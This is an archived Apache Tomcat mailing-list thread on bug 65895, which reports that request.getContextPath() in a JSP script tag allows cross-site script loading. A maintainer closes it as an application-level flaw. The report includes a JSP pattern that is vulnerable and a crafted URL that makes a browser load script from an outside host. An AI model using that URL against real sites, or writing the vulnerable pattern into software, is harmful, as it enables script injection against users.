You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@tomcat.apache.org by bu...@apache.org on 2022/02/17 10:04:40 UTC
[Bug 65895] New: getContextPath() might introduce a xss cross site
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Bug ID: 65895
Summary: getContextPath() might introduce a xss cross site
Product: Tomcat 9
Version: 9.0.58
Hardware: PC
OS: Mac OS X 10.1
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: hawkchen@potix.com
Target Milestone: -----
# steps to reproduce
1. you create a jsp page to include a js with the context path:
<script src="<%=request.getContextPath() %>/import.js"></script>
2. visit the URL below:
localhost:8080//ptst.io/xsspoc?/..;/myapp/contextpath.jsp
(assuming "myapp" is the application context path)
# Current result
a browser will load the cross-site script ptst.io/xsspoc
# Expected result
doesn't load ptst.io/xsspoc
# Other information
* I'm not sure it's a bug or not, welcome any input
* someone mentioned this issue:
https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html
* I have tried this on tomcat 7,8,9, all have the same issue
* tomcat maven plugin doesn't have this issue
<plugin>
<groupId>org.apache.tomcat.maven</groupId>
<artifactId>tomcat7-maven-plugin</artifactId>
<version>2.2</version>
<configuration>
<port>8080</port>
<path>/${project.artifactId}</path>
</configuration>
</plugin>
* jetty 9 doesn't have this issue.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 65895] getContextPath() might introduce a xss cross site
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
--- Comment #2 from hawkchen@potix.com ---
Thanks for your reply.
I have checked that tomcat7-maven-plugin is 7.0.47 which doesn't include bug
57215.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 65895] getContextPath() might introduce a xss cross site
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Mark Thomas <ma...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution|--- |INVALID
--- Comment #1 from Mark Thomas <ma...@apache.org> ---
That is an application security vulnerability in the JSP, not an issue with
Tomcat.
The Servlet spec requires that request.getContext() returns the original,
undecoded path.
My assumption is that the Maven plugin is using a version of Tomcat that
doesn't include the fix for bug 57215.
If Jetty isn't returning the original context path then that is an issue for
Jetty.
Generally, applications should be using application.getContextPath() which
returns the canonical context path.
This behaviour is an argument for the deprecation and eventual removal of
request.getContextPath() - or for its behaviour to be changed to match
ServletContext.getContextPath()
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org